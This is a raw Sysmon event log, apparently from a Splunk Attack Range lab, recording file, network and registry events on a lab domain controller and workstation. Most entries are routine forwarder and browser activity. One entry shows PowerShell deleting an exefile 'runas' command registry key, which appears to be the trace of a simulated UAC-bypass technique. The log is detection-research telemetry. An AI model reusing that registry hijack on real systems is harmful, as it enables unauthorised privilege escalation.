Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.296{0C1E0330-F8F4-60EB-F779-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:28.092{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D61BF582E038BC6E49D4722235CC0942,SHA256=5700BBCBF40F6D45F92A2070972F81D9B208450F47610289641DE7991E9735A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:28.192{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92EABE3C00E1DD9472A49FD264ADBB90,SHA256=4510826BDCE491C5C7CA68591D9EAA638C9EAF92A52B0B41F4F8D435ED2B0B15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:29.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED536A39C5852632206ABE378EBA4D57,SHA256=4DA4F2993D9E1CA1EE377DAB177E0E2173EA9ECFD98283558218A572D3D31506,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:29.529{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4A3BC634279781EA33FD1CA7DB9B8BC,SHA256=C7C5F78733EEABD86112682BA976F2DC6E49D44A9072DEFDC77A5760ABFBE8D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:29.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5855FFE6CF842ACD110BEE2ECF6727E8,SHA256=36395F48B737519E55E53CBF1A31F3A18E2DFD7689C23D271FDC97709964016F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:30.226{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90C4573D43DF1B8F794D9F2DFDD11398,SHA256=79D6A04DD5D4D280B0B61D67670299A177302088C9F4FCEB220A4D2AAF966803,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:30.310{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66D51ABD4878AFB4B8519E8CCD32C651,SHA256=61C182D2E57D210C7C80E34EE3EE23BB1B3597CCB6425F0C9AE918ADB0BA79E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:30.232{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=861CDF8BEB6B9C4809E887AFC55B1ECA,SHA256=393497F12AFAFE74B73BA1EB55DFD3F91811BDA0A20244AC87985B690015CF6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:31.245{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=660158F9CC40216CC8F61DF581A46E12,SHA256=46DDD237B5CBE298A1BD2037AC36236F40E4C66F2165F7374FEA15E5724F48FD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810911Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:30.256{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57498-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:31.357{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0DAC8346DFA4B78615A4C049BC63454,SHA256=9E770C2265361224BB84A1B959B687691BC7EE4D2D1D1BDC89039E2880EFCE0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810912Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:32.357{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3177C60B7370020BC9483ECA30D4899D,SHA256=24972A648FCA7CD0A92538231651CECDD582006AC77ADB4F5104E104C1BB8D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:32.624{466BC892-F8F2-60EB-107E-00000000CF01}10188ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001055579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:10:32.592{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\exefile\shell\runas\command 23542300x80000000000000001055578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:32.260{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24CA186BC3BC050119B0B708BF8D3617,SHA256=868E2DA9D9E67FEE6691497737355E68379C4D44A9AD81D68C39A266C771D0ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.626{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BC73E1C0D68D18A9BD57DF0E7754CBFE,SHA256=61C2F74AA7B4D8CD9CB8223108451B6512FB128B0A99A5563F1AD5B3615E730B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.445{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=34F9535F2E4DA41186AEC58D82BD5A8E,SHA256=0D9743C68A13EA19E950A8D8F18D714992279CFDFC1BA8754B5BEFAE94C8F420,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.445{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=75F6BB540985C4D0DB66CEDC9B4DE26C,SHA256=9903B274E3E3275935199EC3FA1356595595F6D141A910392CADB273861E331E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F091278A3C49B09D391916D0B71F8729,SHA256=D552694DEC80F43106DD3F07BBE3F5E517863FA5B25001A60759D7D07F61DAD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5939FC0F6D0B0B745B2B9C65F3B876AE,SHA256=2DFDFC5D652DC37E964912AFA145EC00661FE3BE5229AB30E703570D9A7031AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CE2563472851DE111E44C447F1E4C539,SHA256=966AE65A8A703987DEAEB7B37CFEE21F9D04B4F7B8C8FA7E50EBF3FB3E739C11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=07BFCF6456E6C00D56836B4699CDA1D6,SHA256=260109A0FBD0932328391052463C244762B442671A87D2086B9AA4F0A0CEF6DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=96B4F53C4C9F615C5D4153D35FB36414,SHA256=AB6CCB0E2A42CD6BAEEA19066EB5A9029D6AB12F9D89DD05D87E94A6AF1D0D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.429{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DD4664689C9B8784618AC931A5C64968,SHA256=A20888C0BBF4092ED7EF4D0786238F23B0C21CD56E36B94E34836783EC5BA4CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.428{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C92BF41A14C37C653AB7C94647684270,SHA256=3918015DEE822B3045C7BBDE285832F1460C5447B2AB2C706B61DB072AB06B1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.426{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4BAC7CD32CA4FC89F297FE23F430409E,SHA256=DF42033A16CF5408D0C0B2A2F05312F85C1748FEDF3A523B4561602D263B4B7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.424{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=27F657DA062B5B14C9734B9FFA162190,SHA256=4B130D62014F5F3B5F29C564F49475A328E38C2BD8B3C0158E971EBCD51ABA8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.261{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63D18582A62017032F6150D6A34D69F1,SHA256=96F286CB08C40349092774482DA5129EF671B77A766A08D18D5A9250B54404C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810913Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:33.373{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47F2A1397BA2268032DD6A0BF34C0F3C,SHA256=815CF4C05237A50D97E7690FF0F5B3409B5FA800C99198F4EBA4AE2D71486B7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:24.668{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62010-false10.0.1.12-8000- 23542300x8000000000000000810914Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:34.389{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF11A2079378D15EE20048A82EEDDCC9,SHA256=F5DD38074437ED85C161E7C714342DA463C584D10238C02AB24CDD2C7AD7F1F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:34.275{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A29E6FB61936666F348817F599FCF5F,SHA256=B46EB2169ACF13B7C2F6F8CBCE79ED062D4E5E22DF39D682C2B98002058F0AB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810915Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:35.391{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D28C931FC44C71BE3CDCC46B0E2D6734,SHA256=9A25ACE12FD66F77558E3261C3FFFC450CDB4F2311574E7029B00A759F4F3FCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:35.277{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=978FDE67FFE60E28F14034C28239160C,SHA256=F17BDD9347B6E22155D0BA79E4A3197766422F821938B644E5A7927BA1F66126,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810916Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:36.406{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAA4780D14D782168BBC6A6BEFBE3687,SHA256=63789B0996E0FCBD47A74EFD0DEF131217982594C29B28C4E3867D6BF33A08E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:36.279{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ED84E4A134E845BF3931740F143CB6D,SHA256=30BA45BD720A2FE7D252864E12C33A4A9EBE4470AC6346B91F2CA2284C287489,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:37.293{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5CCA15C96B8E1C77063C9729200A59E,SHA256=A2D6BDBCF7CE45D42C838BACCA60B933FC9F549823C1F12CE4FDBDCDA9FC6EE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810917Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:37.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D10BB8D74C026C22A16BB78142BF7CC,SHA256=637A94336E94FBA44A0660C4D68B941480A629C5DB9D4B19419D4834290E887D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000810919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:38.422{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49C0A3A8F8498A76DF3F00EA1068961D,SHA256=D624E813D7D04EFB6E22DF8765100BC5304E40BF715A15A2AFA65272234BB138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.709{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=918EC105DEC121CC828C46AEAB9D3D96,SHA256=E55F12E7BB15081C4DDB161DFA186AE7597C0B3959D033B5AB56F088AB1F3CA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.462{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0757A517886858F0F9ECACE419650AB3,SHA256=0E85582FBEB19F3A2D5046748932ACD4C2A33CCE2ED340A7E78C2288AA2803F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F21AE0F5393771800E57158193C5B5D8,SHA256=8ACC55712EE62A25857FC330CE6A7E090AD4A8579C7DC30A45E42434024F676A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001055608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=272C41576B3F48CEA1F0F26E9E00776D,SHA256=56AB52D147C5CB82580FEDCC23C75A702A3E6BFDE5EB067DD6A52B769BE69E66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4E8D8650EF254251EF33A639C2DA8D74,SHA256=F4D6CF66F692968CD5ECF948E69F4BC4F64F55D687ECA15DB9601E4E00CF8E72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=15DD2A14F56CD0C02D6101A89D66DC85,SHA256=66660F642A8C17D6580DB94EC2CEA861F31D4570A719C503122EF7E53DA39392,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2D78145DF5D1C3105FA988FAD9A5DD02,SHA256=7F130FB670D8670B3B2C97EFAE2246DF5AB7F0F619FC251056E270BBBED5FB0D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001055604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D183525B7DE062B8B4ECABE2B251ED07,SHA256=37C5B2B645059446F4D9A5AE9ABBAFD695062375EE4A8A301F6B538A232CF83A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=62769898C1712F5C9896C4FC83CDF411,SHA256=5D4DB8321C2853CF0883EC1F2A738AF0A5299EC3D9CAA33CD037BEA040E6AF4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E85B5DE881A158AC55DAD31ABD2E1F46,SHA256=BFF243A1CB07C350727B0568CE675156155A2AC19CC6A9CBBD79679DDDD26326,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=84C5F37559E429065E6DB4FFD9437ED2,SHA256=BD0C43286C6903A5C3D94CED1E1B03EEA56EC7EDAE60E00CE1DC724E98B94CA0,IMPHASH=00000000000000000000000000000000falsetrue 
